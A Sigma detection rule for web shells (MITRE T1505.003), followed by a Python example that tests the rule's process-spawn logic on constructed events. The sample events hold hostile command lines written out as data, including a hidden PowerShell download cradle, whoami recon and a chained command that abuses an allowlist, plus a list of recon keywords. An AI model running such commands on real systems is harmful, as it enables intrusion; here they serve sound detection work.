title: Web Shell (T1505.003)
id: df00tech-t1505-003
status: experimental
description: "Adversaries install web shells on compromised web servers to maintain persistent access. A web shell is a script (PHP, ASP, ASPX, JSP, etc.) that provides command execution, file upload/download, and network proxying via HTTP, so the attacker's traffic blends into normal web requests to the server. Web shells are used by many threat groups, including APT28, APT39, HAFNIUM, OilRig, GALLIUM, and Sandworm. China Chopper and P.A.S. Webshell are widely used generic examples. WIREFIRE and BUSHWALK are web shells built for a specific appliance (Ivanti Connect Secure VPN)."
references:
  - https://attack.mitre.org/techniques/T1505/003/
  - https://df00tech.com/detections/T1505.003
author: df00tech
date: 2026/04/21
tags:
  - attack.persistence
  - attack.t1505.003
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # The df00tech logic is a KQL/SPL query that could not be auto-translated.
  # The selections below approximate it for process_creation telemetry: a web
  # server worker process spawning a command interpreter or script host, which
  # is the behaviour a web shell produces when it executes operator commands.
  selection_parent:
    ParentImage|endswith:
      - '\w3wp.exe'
      - '\httpd.exe'
      - '\nginx.exe'
      - '\php-cgi.exe'
  selection_child:
    Image|endswith:
      - '\cmd.exe'
      - '\powershell.exe'
      - '\pwsh.exe'
      - '\cscript.exe'
      - '\wscript.exe'
  condition: selection_parent and selection_child
falsepositives:
  - IIS application pools that legitimately use cmd.exe for application integration (rare, but present in legacy systems; allowlist the exact parent and command line rather than the parent alone)
  - "PHP or JSP applications that use exec() or shell_exec() for legitimate system operations (image processing, file conversion)"
  - Legitimate web deployment pipelines (CI/CD) that write files to web directories as part of automated deployment
  - System administration scripts that run under the IIS application pool identity for configuration management
level: critical
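To show how the process-spawn logic behaves against the false positives listed above, here is an added Python example (not part of the df00tech rule or its KQL/SPL query) that evaluates constructed Sysmon-style process_creation events. The web server and interpreter lists mirror the rule; the recon keyword escalation, the C:\LegacyApp allowlist entry and the sample events are assumptions made for the example.

```python
import re
from typing import Dict, List

Event = Dict[str, str]

# Web server worker processes that should not normally spawn interpreters.
WEB_SERVER_PARENTS = ("\\w3wp.exe", "\\httpd.exe", "\\nginx.exe", "\\php-cgi.exe")

# Command interpreters and script hosts a web shell typically invokes.
INTERPRETERS = ("\\cmd.exe", "\\powershell.exe", "\\pwsh.exe", "\\cscript.exe", "\\wscript.exe")

# Recon commands commonly typed into a freshly planted shell; their presence
# raises the verdict from high to critical.
RECON_KEYWORDS = ("whoami", "net user", "net localgroup", "ipconfig", "systeminfo", "tasklist", "nltest")

# Allowlist for the legacy-integration false positive. Each entry pins the
# parent image and the *whole* command line with a tight regex so that extra
# tokens such as "&& whoami" cannot ride along. The C:\LegacyApp path is a
# hypothetical placeholder, not something from the original rule.
ALLOWLIST = [
    ("\\w3wp.exe", re.compile(r"cmd\.exe /c c:\\legacyapp\\bin\\convert\.bat [\w.-]+ [\w.-]+")),
]


def _endswith_any(value: str, suffixes) -> bool:
    value = value.lower()
    return any(value.endswith(s.lower()) for s in suffixes)


def is_allowlisted(event: Event) -> bool:
    parent = event.get("ParentImage", "").lower()
    cmd = event.get("CommandLine", "").lower()
    return any(parent.endswith(p) and rx.fullmatch(cmd) is not None for p, rx in ALLOWLIST)


def evaluate(event: Event) -> str:
    """Return 'critical', 'high' or 'none' for one process_creation event."""
    if not _endswith_any(event.get("ParentImage", ""), WEB_SERVER_PARENTS):
        return "none"  # parent is not a web server worker
    if not _endswith_any(event.get("Image", ""), INTERPRETERS):
        return "none"  # child is not an interpreter (e.g. an image converter)
    if is_allowlisted(event):
        return "none"  # documented legacy integration with the exact command shape
    cmd = event.get("CommandLine", "").lower()
    return "critical" if any(k in cmd for k in RECON_KEYWORDS) else "high"


# Constructed Sysmon-style events, not real telemetry.
SAMPLE_EVENTS: List[Event] = [
    # 1. classic web shell recon from an IIS worker -> critical
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami /all"},
    # 2. Apache worker launching a PowerShell download cradle -> high
    {"ParentImage": r"C:\Apache24\bin\httpd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')\""},
    # 3. allowlisted legacy integration, exact command shape -> none
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c C:\LegacyApp\bin\convert.bat in.tif out.png"},
    # 4. same recon command, but not from a web server parent -> none
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    # 5. PHP exec() running an image converter, not an interpreter -> none
    {"ParentImage": r"C:\php\php-cgi.exe",
     "Image": r"C:\Program Files\ImageMagick\magick.exe",
     "CommandLine": "magick.exe in.jpg -resize 50% out.jpg"},
    # 6. allowlist abuse: legitimate prefix with a chained recon command -> critical
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c C:\LegacyApp\bin\convert.bat in.tif && whoami"},
]


def run(events: List[Event] = SAMPLE_EVENTS) -> List[str]:
    """Evaluate every event and return the verdicts in order."""
    return [evaluate(e) for e in events]


if __name__ == "__main__":
    for e, verdict in zip(SAMPLE_EVENTS, run()):
        print(f"{verdict:8} {e['ParentImage'].split(chr(92))[-1]} -> {e['CommandLine']}")
```

Event 6 is the reason the allowlist anchors on the full command line: a prefix-only exception for the legacy batch file would also suppress `convert.bat in.tif && whoami`, which is exactly how an operator would hide inside an existing exclusion.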
